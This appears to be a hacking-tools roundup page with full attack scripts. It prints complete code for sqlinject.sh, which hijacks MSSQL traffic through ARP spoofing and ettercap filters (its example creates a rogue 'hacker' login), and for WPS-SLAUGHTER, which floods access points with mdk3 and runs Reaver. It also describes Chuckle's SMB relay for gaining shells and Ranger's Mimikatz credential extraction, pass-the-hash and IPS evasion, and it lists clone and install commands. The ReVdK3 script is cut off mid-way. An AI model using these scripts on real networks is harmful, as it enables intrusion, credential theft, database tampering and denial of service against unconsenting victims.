Chuckle – An automated SMB Relay Script.
Latest Change 2/3/2016 : chuckle.sh; Modified to use unixwiz nbtscan for reliability.

chuckle.sh

Chuckle requires a few tools to work:
+ Nmap
+ Responder
+ SMBRelayX
+ Latest version of Veil
+ metasploit

Usuage should be fairly simple, run as root or use sudo:

sudo ./chuckle.sh

Wait a while or coax a prvileged user into authenticating against you and you should end up with a shell on your target machine.  Be careful when running this and never run on a network you are not permitted to do so.

Usage :

git clone https://github.com/nccgroup/chuckle && cd chuckle
sudo ./chuckle.sh

Source: https://github.com/nccgroup

This script is designed to automate the process of hijacking an MSSQL database connection. This script can be used to perform a MITM attack between two IP addresses using ettercap and ARP spoofing. You also submit an original SQL query and a new SQL query. The script will create, compile, and load an ettercap filter to replace the original SQL string with your new one. This should work on any MSSQL connection that is not encrypted.

sqlinject.sh

SQLinject.sh Script:

#!/bin/bash
#
####################################################################
#
# Written by Rick Osgood
#
# This script is designed to automate the process of hijacking an
# MSSQL database connection. This script can be used to perform a
# MITM attack between two IP addresses using ettercap and ARP
# spoofing. You also submit an original SQL query and a new SQL
# query. The script will create, compile, and load an ettercap
# filter to replace the original SQL string with your new one.
# This should work on any MSSQL conncetion that is not encrypted.
#
####################################################################
 
args=("$@") #array to store command line arguments
 
# Set variable defalts
SqlPort=1433
ServerIP="NULL"
ClientIP="NULL"
FileName="NULL"
 
# Help function
print_help(){
        echo "Usage: ./SQLInject.sh -o [original SQL query] -i [new SQL query] -s [MSSQL Server IP]
-c [SQL Client IP]"
        echo ""
        echo "Example: ./SQLInject.sh -o \"SELECT * from Products WHERE ProductID=1;\" -i \"CREATE L
OGIN hacker WITH PASSWORD=\"password01\";\" -s 10.0.1.20 -c 10.0.1.100"
        echo ""
        echo "This script creates an ettercap filter that will identify a SQL string"
        echo "and replace it with a new string. The script will then compile the filter"
        echo "and run ettercap with the filter loaded. Ettercap will perform an ARP"
        echo "spoofing attack against the specified IP addresses automatically. All you"
        echo "have to do is sit back and wait for the original query to be submitted."
        echo ""
        echo " --help"
        echo "     Show this message."
        echo " -o"
        echo "     Specify the original SQL string to be replaced."
        echo " -i"
        echo "     Specify the new SQL string to be injected. This string must not"
        echo "     longer than the original query string."
        echo " -s"
        echo "     Specify the MSSQL server IP for ARP poison attack. May also use gateway IP"
        echo " -c"
        echo "     Specify the SQL cient IP for ARP poison attack."
        echo " -f"
        echo "     Specify the output filename for the ettercap filter."
        echo " -p"
        echo "     Optional. Specifiy the MSSQL traffic port. Defaults to 1433."
}
 
# If not enough arguments then quit
if [ $# -lt "4" ]; then
        print_help
        exit 1
fi
 
COUNTER=0 #Count from zero to number of arguments
while [ $COUNTER -lt $# ]; do
        if [ "${args[$COUNTER]}" == "--help" ]; then
                print_help
                exit 0
 
        elif [ "${args[$COUNTER]}" == "-o" ]; then
                COUNTER=$(($COUNTER+1))
                OldQuery=${args[$COUNTER]}
 
        elif [ "${args[$COUNTER]}" == "-i" ]; then
                COUNTER=$((COUNTER+1))
                NewQuery=${args[$COUNTER]}
 
        elif [ "${args[$COUNTER]}" == "-s" ]; then
                COUNTER=$((COUNTER+1))
                ServerIP=${args[$COUNTER]}
 
        elif [ "${args[$COUNTER]}" == "-c" ]; then
                COUNTER=$((COUNTER+1))
                ClientIP=${args[$COUNTER]}
 
        elif [ "${args[$COUNTER]}" == "-f" ]; then
                COUNTER=$((COUNTER+1))
                FileName=${args[$COUNTER]}
 
        elif [ "${args[$COUNTER]}" == "-p" ]; then
                COUNTER=$((COUNTER+1))
                SqlPort=${args[$COUNTER]}
 
        else
                echo "Error: Unknown argument \"${args[$COUNTER]}\""
                echo ""
                print_help
                exit 1
        fi
 
        COUNTER=$(($COUNTER+1))
done;
 
# Is anything missing?
if [ "$ServerIP" == "NULL" ]; then
        echo "You must specify server IP!"
        exit 1
 
elif [ "$ClientIP" == "NULL" ]; then
        echo "You must specify client IP!"
        exit 1
 
elif [ "$FileName" == "NULL" ]; then
        echo "You must specify the file name for the ettercap filter!"
        exit 1
fi
 
# Calculate length of injected SQL query
length2=`echo $NewQuery | wc -m`
length2=$((length2 - 1))
echo "New string is $length2 bytes"
 
# Calculate length of original SQL query
length1=`echo $OldQuery | wc -m`
length1=$((length1 - 1))
echo "Original string is $length1 bytes"
 
# What's the difference?
difference=$((length1 - length2))
echo "Difference is $difference bytes"
 
# If the new string is too long it won't work
if [ $difference -lt 0 ]; then
        echo ""
        echo "New SQL query is longer than original! Quitting..."
        exit 0
fi
 
temp=""
for i in `seq 1 $difference`;
do
        temp="$temp "
done
PaddedQuery="$NewQuery$temp"
echo "PaddedQuery is \"$PaddedQuery\""
echo ""
 
IFS=$'\n' # change separater to newline only. Required or the for loop skips spaces
 
echo "Converting original query to hex..."
# Convert original query to hex string with NULL padding (How it appears over the wire)
OldQueryHex=""
for line in $(echo $OldQuery | sed -e 's/\(.\)/\1\n/g')
do
        OldQueryHex="$OldQueryHex\x"
        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
        OldQueryHex="$OldQueryHex$temp"
        OldQueryHex="$OldQueryHex\x00"
done
 
echo "Converting new query to hex..."
# Convert new query to hex string now.
NewQueryHex=""
for line in $(echo $PaddedQuery | sed -e 's/\(.\)/\1\n/g')
do
        NewQueryHex="$NewQueryHex\x"
        temp=`echo $line | hexdump -C |head -n1 | awk -F"  " {'print $2'} | awk {'print $1'}`
        NewQueryHex="$NewQueryHex$temp"
        NewQueryHex="$NewQueryHex\x00"
done
 
echo "Writing ettercap filter now..."
 
# Start writing actual ettercap filter file
echo "if (ip.proto == TCP && tcp.dst == $SqlPort) {" > $FileName
echo "       msg(\"SQL traffic discovered\");" >> $FileName
echo "       if (search(DATA.data,\"$OldQueryHex\")) {" >> $FileName
echo "              msg(\"Found our string!\");" >> $FileName
echo "              replace(\"$OldQueryHex\",\"$NewQueryHex\");" >> $FileName
echo "              msg(\"...and replaced it :)\");" >> $FileName
echo "       }" >> $FileName
echo "}" >> $FileName
 
# Exeute etterfilter to create the compiled filter
etterfilter $FileName -o $FileName.ef
 
# Execute ettercap and load the filter
ettercap -T -q -F ./$FileName.ef -M ARP //$ServerIP// //$ClientIP//
 
echo ""
echo "Completed Successfully!"

Source : http://pastebin.com/Nge9rx7g |
for usage detail here: https://blog.anitian.com/hacking-microsoft-sql-server-without-a-password/

This tool helps to automate the process of testing router WPS vulnerability to flood attacks using multiple* wireless adapters to see if it will reboot and UNLOCK.

wps-slaughter

usage:
git clone https://github.com/ApatheticEuphoria/WPS-SLAUGHTER && cd WPS-SLAUGHTER
chmod +x WPS-SLAUGHTER.sh
./WPS-SLAUGHTER.sh

Script:

#!/bin/bash
declare BSSID;
declare ESSID;
declare CHANNEL;
declare ADAPTER1;
declare ADAPTER2;
declare ADAPTER3;
declare ADAPTER4;
declare ADAPTER5;

echo "
██╗    ██╗██████╗ ███████╗      ███████╗██╗      █████╗ ██╗   ██╗ ██████╗ ██╗  ██╗████████╗███████╗██████╗ 
██║    ██║██╔══██╗██╔════╝      ██╔════╝██║     ██╔══██╗██║   ██║██╔════╝ ██║  ██║╚══██╔══╝██╔════╝██╔══██╗
██║ █╗ ██║██████╔╝███████╗█████╗███████╗██║     ███████║██║   ██║██║  ███╗███████║   ██║   █████╗  ██████╔╝
██║███╗██║██╔═══╝ ╚════██║╚════╝╚════██║██║     ██╔══██║██║   ██║██║   ██║██╔══██║   ██║   ██╔══╝  ██╔══██╗
╚███╔███╔╝██║     ███████║      ███████║███████╗██║  ██║╚██████╔╝╚██████╔╝██║  ██║   ██║   ███████╗██║  ██║
 ╚══╝╚══╝ ╚═╝     ╚══════╝      ╚══════╝╚══════╝╚═╝  ╚═╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝   ╚═╝   ╚══════╝╚═╝  ╚═╝
"

echo "WPS-SLAUGHTER BY: APATHETIC EUPHORIA"

sudo rfkill unblock all

echo "************** - How Many Wlan Adapters Would You Like To Use? - ************** 
1)1 Adapter
2)2 Adapters
3)3 Adapters
4)4 Adapters
5)5 Adapters"

read a
case $a in
	1)

echo 
read -p " - What is the name of your Wlan Adapter (Ex:Wlan0) - ": ADAPTER1;

echo "------------------------------"
echo "Enabling Monitor Mode"
sudo ifconfig $ADAPTER1 down
sleep 3
sudo iwconfig $ADAPTER1 mode monitor
sleep 3
sudo ifconfig $ADAPTER1 up
echo "Monitor Mode Enabled"
echo "------------------------------"

echo "************** - Would you like to Change the Wlan Adapter's MAC Address? - ************** 
1)Yes
2)No"

read c
case $c in
	1)
echo "------------------------------"
echo "Setting the MAC Address"
sudo ifconfig $ADAPTER1 down
sleep 3
macchanger $ADAPTER1 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER1 up
echo "MAC Changed"
echo "------------------------------"

;;
	2)
;;
	*)Invalid Option
;;
esac

gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"

echo 
read -p " - What is the BSSID(MAC) of the Target - ": BSSID;

echo 
read -p " - What is the ESSID(Ap Name) of the Target - ": ESSID;

echo 
read -p " - What is the CHANNEL # of the Target - ": CHANNEL;
echo "-------------------------------------"


menu () {
echo "************** - Which Attack Would You Like To Use? - ************** 
1)EAPOL Start Flood 
2)Authentication Flood
3)Reaver
4)Check if Access Point WPS is UNLOCKED"

read d
case $d in
	1)
timeout 20s mdk3 $ADAPTER1 x 0 -t $BSSID -n $ESSID -s 250
menu
;;
	2)
timeout 60 mdk3 $ADAPTER1 a -a $BSSID -m
menu
;;
	3)
reaver -i $ADAPTER1 -b $BSSID -c $CHANNEL -vv
menu
;;
	4)
gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"
menu
;;
	*)Invalid Option
menu
;;
esac
}

menu

;;
	2)

echo 
read -p " - What is the name of your 1st Wlan Adapter (Ex:Wlan0) - ": ADAPTER1;

echo 
read -p " - What is the name of your 2nd Wlan Adapter (Ex:Wlan1) - ": ADAPTER2;

echo "------------------------------"
echo "Enabling Monitor Mode"
sudo ifconfig $ADAPTER1 down
sleep 3
sudo iwconfig $ADAPTER1 mode monitor
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
sudo iwconfig $ADAPTER2 mode monitor
sleep 3
sudo ifconfig $ADAPTER2 up
echo "Monitor Mode Enabled"
echo "------------------------------"

echo "************** - Would you like to set the 2 Adapters to an Identical MAC Address? - ************** 
1)Yes
2)No"

read f
case $f in
	1)
echo "------------------------------"
echo "Setting the MAC Address"
sudo ifconfig $ADAPTER1 down
sleep 3
macchanger $ADAPTER1 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
macchanger $ADAPTER2 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER2 up
echo "MAC Changed"
echo "------------------------------"
;;
	2)
;;
	*)Invalid Option
;;
esac



gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"

echo 
read -p " - What is the BSSID(MAC) of the Target - ": BSSID;

echo 
read -p " - What is the ESSID(Ap Name) of the Target - ": ESSID;

echo 
read -p " - What is the CHANNEL # of the Target - ": CHANNEL;
echo "-------------------------------------"

menu () {
echo "************** - Which Attack Would You Like To Use? - ************** 
1)EAPOL Start Flood 
2)Authentication Flood
3)Reaver
4)Check if Access Point WPS is UNLOCKED"

read g
case $g in
	1)
timeout 20s mdk3 $ADAPTER1 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER2 x 0 -t $BSSID -n $ESSID -s 250
menu
;;
	2)
timeout 60 mdk3 $ADAPTER1 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER2 a -a $BSSID -m
menu
;;
	3)
reaver -i $ADAPTER1 -b $BSSID -c $CHANNEL -vv
menu
;;
	4)
gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"
menu
;;
	*)Invalid Option
menu
;;
esac

}

menu

;;
	3)

echo 
read -p " - What is the name of your 1st Wlan Adapter (Ex:Wlan0) - ": ADAPTER1;

echo 
read -p " - What is the name of your 2nd Wlan Adapter (Ex:Wlan1) - ": ADAPTER2;

echo 
read -p " - What is the name of your 3rd Wlan Adapter (Ex:Wlan2) - ": ADAPTER3;

echo "------------------------------"
echo "Enabling Monitor Mode"
sudo ifconfig $ADAPTER1 down
sleep 3
sudo iwconfig $ADAPTER1 mode monitor
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
sudo iwconfig $ADAPTER2 mode monitor
sleep 3
sudo ifconfig $ADAPTER2 up
sudo ifconfig $ADAPTER3 down
sleep 3
sudo iwconfig $ADAPTER3 mode monitor
sleep 3
sudo ifconfig $ADAPTER3 up
echo "Monitor Mode Enabled"
echo "------------------------------"

echo "************** - Would you like to set the 3 Adapters to an Identical MAC Address? - ************** 
1)Yes
2)No"

read i
case $i in
	1)
echo "------------------------------"
echo "Setting the MAC Address"
sudo ifconfig $ADAPTER1 down
sleep 3
macchanger $ADAPTER1 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
macchanger $ADAPTER2 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER2 up
sudo ifconfig $ADAPTER3 down
sleep 3
macchanger $ADAPTER3 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER3 up
echo "MAC Changed"
echo "------------------------------"
;;
	2)
;;
	*)Invalid Option
;;
esac

gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"

echo 
read -p " - What is the BSSID(MAC) of the Target - ": BSSID;

echo 
read -p " - What is the ESSID(Ap Name) of the Target - ": ESSID;

echo 
read -p " - What is the CHANNEL # of the Target - ": CHANNEL;
echo "-------------------------------------"

menu () {
echo "************** - Which Attack Would You Like To Use? - ************** 
1)EAPOL Start Flood 
2)Authentication Flood
3)Reaver
4)Check if Access Point WPS is UNLOCKED"

read j
case $j in
	1)
timeout 20s mdk3 $ADAPTER1 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER2 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER3 x 0 -t $BSSID -n $ESSID -s 250
menu
;;
	2)
timeout 60 mdk3 $ADAPTER1 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER2 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER3 a -a $BSSID -m
menu
;;
	3)
reaver -i $ADAPTER1 -b $BSSID -c $CHANNEL -vv
menu
;;
	4)
gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"
menu
;;
	*)Invalid Option
menu
;;
esac
}

menu

;;
	4)
echo 
read -p " - What is the name of your 1st Wlan Adapter (Ex:Wlan0) - ": ADAPTER1;

echo 
read -p " - What is the name of your 2nd Wlan Adapter (Ex:Wlan1) - ": ADAPTER2;

echo 
read -p " - What is the name of your 3rd Wlan Adapter (Ex:Wlan2) - ": ADAPTER3;

echo 
read -p " - What is the name of your 4th Wlan Adapter (Ex:Wlan3) - ": ADAPTER4;

echo "------------------------------"
echo "Enabling Monitor Mode"
sudo ifconfig $ADAPTER1 down
sleep 3
sudo iwconfig $ADAPTER1 mode monitor
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
sudo iwconfig $ADAPTER2 mode monitor
sleep 3
sudo ifconfig $ADAPTER2 up
sudo ifconfig $ADAPTER3 down
sleep 3
sudo iwconfig $ADAPTER3 mode monitor
sleep 3
sudo ifconfig $ADAPTER3 up
sudo ifconfig $ADAPTER4 down
sleep 3
sudo iwconfig $ADAPTER4 mode monitor
sleep 3
sudo ifconfig $ADAPTER4 up
echo "Monitor Mode Enabled"
echo "------------------------------"

echo "************** - Would you like to set ALL Wlan Adapters to the same MAC Address? - ************** 
1)Yes
2)No"

read l
case $l in
	1)
echo "------------------------------"
echo "Setting All Wlan MAC Addresses to Identical MAC"
sudo ifconfig $ADAPTER1 down
sleep 3
macchanger $ADAPTER1 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
macchanger $ADAPTER2 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER2 up
sudo ifconfig $ADAPTER3 down
sleep 3
macchanger $ADAPTER3 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER3 up
sudo ifconfig $ADAPTER4 down
sleep 3
macchanger $ADAPTER4 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER4 up
echo "MACs Changed"
echo "------------------------------"
;;
	2)
;;
	*)Invalid Option
;;
esac


gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"

echo 
read -p " - What is the BSSID(MAC) of the Target - ": BSSID;

echo 
read -p " - What is the ESSID(Ap Name) of the Target - ": ESSID;

echo 
read -p " - What is the CHANNEL # of the Target - ": CHANNEL;
echo "-------------------------------------"

menu () {
echo "************** - Which Attack Would You Like To Use? - ************** 
1)EAPOL Start Flood 
2)Authentication Flood
3)Reaver
4)Check if Access Point WPS is UNLOCKED"

read m
case $m in
	1)
timeout 20s mdk3 $ADAPTER1 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER2 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER3 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER4 x 0 -t $BSSID -n $ESSID -s 250
menu
;;
	2)
timeout 60 mdk3 $ADAPTER1 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER2 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER3 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER4 a -a $BSSID -m
menu
;;
	3)
reaver -i $ADAPTER1 -b $BSSID -c $CHANNEL -vv
menu
;;
	4)
gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"
menu
;;
	*)Invalid Option
menu
;;
esac
}

menu

;;
	5)

echo 
read -p " - What is the name of your 1st Wlan Adapter (Ex:Wlan0) - ": ADAPTER1;

echo 
read -p " - What is the name of your 2nd Wlan Adapter (Ex:Wlan1) - ": ADAPTER2;

echo 
read -p " - What is the name of your 3rd Wlan Adapter (Ex:Wlan2) - ": ADAPTER3;

echo 
read -p " - What is the name of your 4th Wlan Adapter (Ex:Wlan3) - ": ADAPTER4;

echo 
read -p " - What is the name of your 5th Wlan Adapter (Ex:Wlan4) - ": ADAPTER5;

echo "------------------------------"
echo "Enabling Monitor Mode"
sudo ifconfig $ADAPTER1 down
sleep 3
sudo iwconfig $ADAPTER1 mode monitor
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
sudo iwconfig $ADAPTER2 mode monitor
sleep 3
sudo ifconfig $ADAPTER2 up
sudo ifconfig $ADAPTER3 down
sleep 3
sudo iwconfig $ADAPTER3 mode monitor
sleep 3
sudo ifconfig $ADAPTER3 up
sudo ifconfig $ADAPTER4 down
sleep 3
sudo iwconfig $ADAPTER4 mode monitor
sleep 3
sudo ifconfig $ADAPTER4 up
sudo ifconfig $ADAPTER5 down
sleep 3
sudo iwconfig $ADAPTER5 mode monitor
sleep 3
sudo ifconfig $ADAPTER5 up
echo "Monitor Mode Enabled"
echo "------------------------------"

echo "************** - Would you like to set ALL Wlan Adapters to the same MAC Address? - ************** 
1)Yes
2)No"

read o
case $o in
	1)
echo "------------------------------"
echo "Setting All Wlan MAC Addresses to Identical MAC"
sudo ifconfig $ADAPTER1 down
sleep 3
macchanger $ADAPTER1 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER1 up
sudo ifconfig $ADAPTER2 down
sleep 3
macchanger $ADAPTER2 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER2 up
sudo ifconfig $ADAPTER3 down
sleep 3
macchanger $ADAPTER3 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER3 up
sudo ifconfig $ADAPTER4 down
sleep 3
macchanger $ADAPTER4 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER4 up
sudo ifconfig $ADAPTER5 down
sleep 3
macchanger $ADAPTER5 -m 02:22:88:29:EC:6F
sleep 3
sudo ifconfig $ADAPTER5 up
echo "MACs Changed"
echo "------------------------------"
;;
	2)
;;
	*)Invalid Option
;;
esac


gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"

echo 
read -p " - What is the BSSID(MAC) of the Target - ": BSSID;

echo 
read -p " - What is the ESSID(Ap Name) of the Target - ": ESSID;

echo 
read -p " - What is the CHANNEL # of the Target - ": CHANNEL;
echo "-------------------------------------"

menu () {
echo "************** - Which Attack Would You Like To Use? - ************** 
1)EAPOL Start Flood 
2)Authentication Flood
3)Reaver
4)Check if Access Point WPS is UNLOCKED"

read p
case $p in
	1)
timeout 20s mdk3 $ADAPTER1 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER2 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER3 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER4 x 0 -t $BSSID -n $ESSID -s 250 & timeout 20s mdk3 $ADAPTER5 x 0 -t $BSSID -n $ESSID -s 250
menu
;;
	2)
timeout 60 mdk3 $ADAPTER1 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER2 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER3 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER4 a -a $BSSID -m & timeout 60 mdk3 $ADAPTER5 a -a $BSSID -m
menu
;;
	3)
reaver -i $ADAPTER1 -b $BSSID -c $CHANNEL -vv
menu
;;
	4)
gnome-terminal  --geometry=111x20 --title='Scanning for targets' -e "wash -i $ADAPTER1"
menu
;;
	*)Invalid Option
menu
;;
esac
}

menu

;;

esac

Source: https://github.com/ApatheticEuphoria

Latest Change v0.43b (25/2/2016):
+ ranger.py:
— WMIEXEC Metasploit web_delivery Memory Injector.
— ATEXEC Metasploit web_delivery Memory Injector.
— Create Pasteable web_delivery Attack.

A tool to support security professionals access and interact with remote Microsoft Windows based systems.
This project was conceptualized with the thought process, we did not invent the bow or the arrow, just a more efficient way of using it. Ranger is a command-line driven attack and penetration testing tool, which as the ability to use an instantiated catapult server to deliver capabilities against Windows Systems. As long as a user has a set of credentials or a hash set (NTLM, LM, LM:NTLM) he or she can gain access to systems that are apart of the trust.
Using this capability a security professional can extract credentials out of memory in clear-text, access SAM tables, run commands, execute PowerShell scripts, Windows Binaries, and other tools. At this time the tool bypasses the majority of IPS vendor solutions unless they have been custom tuned to detect it. The tool was developed using our home labs in an effort to support security professionals doing legally and/or contractually supported activities.
More functionality is being added, but at this time the tool uses the community contributions from repositories related to the PowerShell PowerView, PowerShell Mimikatz and Impacket teams.

range v0.43b 2016

Dependency:
+ Nmap
+ Metasploit

Method & Attack
Method:
–wmiexec
–psexec
–atexec
Attack:
–command
–invoker
–downloader
–executor
–domain-group-members
–local-group-members
–get-domain-membership
–get-forest-domains
–get-forest
–get-dc
–find-la-access

Installation:

wget https://raw.githubusercontent.com/funkandwagnalls/ranger/master/setup.sh
chmod a+x setup.sh
./setup.sh
rm setup.sh

Update:
ranger --update

Source : https://github.com/funkandwagnalls | Our Post Before

Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2)
Menu Options:
0) Full Automatic Mode (Applies To All Encryption Types)
1) WEP Mode (Commands can be executed from a menu to easily circumvent any WEP connection)
2) WPS Mode (May also have WPA, WPA2, or WEP displayed. Ignore this, as it has no effect on success rate)
3) WPA Mode (Capture 4-way handshake, dictionary attack, bruteforce and others, VERY LOW SUCCESS RATE)
4) WPA2 Mode (Almost identical to WPA attacks. This mode also carries a VERY LOW SUCCESS RATE)

wifi hacking script v1.3

usage:

git clone https://github.com/esc0rtd3w/wifi-hacker && cd wifi-hacker
chmod +x wifi-hacker.sh
./wifi-hacker.sh

Source: https://github.com/esc0rtd3w

This Script was created for Access Points that locks up for long periods of time. It works by starting reaver and continously detect when reaver is rate limiting pins, once reaver detects the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks are killed once reaver detects that the AP has unlocked itself!
Requirements:
[1] reaver
[2] bully
[3] mdk3
[4] aireplay-ng

ReVdK3 Acces Point pentest Script.

Usage:

git clone https://github.com/r0bag/pentest && cd pentest
chmod +x *.sh
./ReVdK3-r3.sh

Script:

#!/bin/bash
declare MAC;
declare PIN_TIME;
declare WLAN;
declare MON1;
declare MON2;
declare MON3;
declare PHY_OF_WLAN_1;
declare NO_OF_MONITOR_INTERFACES_CHECK;
declare MONITOR_INTERFACES;
declare STOP_INTERFACE;
declare VARIABLE;
declare CHANNEL;
declare DISTANCE_BETWEEN_PINS;
declare TIMEOUT;
declare ESSID;
declare SATISFIED_OPTION=r;
declare REAVER_COMMAND_LINE;
declare MDK3_MAIN_MENU_OPTION;
declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
declare EAPOL_START_FLOOD_COMMAND;
declare AUTH_DOS_FLOOD_COMMAND;
declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
declare EAPOL_LOG_OFF_FLOOD_COMMAND;
declare VARIABLE_CHECK_FOR_RATE_LIMITING;
declare TARGET_STATION;
declare MDK3_KILLALL_1
declare AIREPLAY_KILLALL;
declare SUCCESSIVE_EAPOL_FAILURES;
declare AIREPLAY_RESET;
declare MONITOR_INTERFACES_CHECK;
declare GO_STATUS;
declare NO_GO_STATUS
clear
GO_STATUS=`echo -e "\e[31m[\e[34mAffirmative\e[31m]\e[0m"`
NO_GO_STATUS=`echo -e "\e[31m[\e[33mNegative\e[31m]\e[0m"`
REAVER_CHECK=`which reaver`
BULLY_CHECK=`which bully`
MDK3_CHECK=`which mdk3`
AIREPLAY_NG_CHECK=`which aireplay-ng`
GNOME_TERMINAL_CHECK=`which gnome-terminal`
TIMEOUT_CHECK=`which timeout`
echo -e "\e[36mChecking to see if the following programs are installed";
echo -e "\e[36mProgram                     Exist?"
echo -ne "\e[36m[1] reaver";
if [  -z "$REAVER_CHECK" ]; then
echo -e "                  $NO_GO_STATUS";
else
echo -e "                  $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[2] bully";
if [ -z "$BULLY_CHECK" ]; then
echo -e "                   $NO_GO_STATUS";
else
echo -e "                   $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[3] mdk3";
if [ -z "$MDK3_CHECK" ]; then
echo -e "                    $NO_GO_STATUS";
else
echo -e "                    $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[4] aireplay-ng";
if [ -z  "$AIREPLAY_NG_CHECK" ]; then
echo -e "             $NO_GO_STATUS";
else
echo -e "             $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] gnome-terminal";
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "          $NO_GO_STATUS";
else
echo -e "          $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] timeout";
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "                 $NO_GO_STATUS";
else
echo -e "                 $GO_STATUS";
fi
sleep 0.2
if [ -z "$MDK3_CHECK" ]; then
echo -e "\e[31m\e[1mmdk3 is not installed.Exiting script...";
exit
fi
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e "\e[31m\e[1maireplay-ng is not installed.Exiting script...";
exit
fi
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "\e[31m\e[1mgnome-terminal is not installed.Exiting script...";
exit
fi
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "\e[31m\e[1mtimeout is not installed.Exiting script...";
exit
fi
clear
#WELCOM MESSAGE
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script#\e[0m";
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
echo -e "\e[36m\e[1m# you choose                                                        #\e[0m"; 
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long  #\e[0m";
echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continously      #\e[0m";
echo -e "\e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects     #\e[0m";
echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself !  #\e[0m";
echo -e "\e[36m\e[1m# The prcoess goes on...                                            #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo ;
echo  -e "\e[37m\e[44m\e[1m ReVdK3.sh-r3 \e[0m";
echo ;
echo ;
echo -e	"\e[36m\e[40m\e[1m******************************************************\e[0m";
echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface  *\e[0m";
echo -e	"\e[36m\e[40m\e[1m******************************************************\e[0m";
echo ; 
read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN; 
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
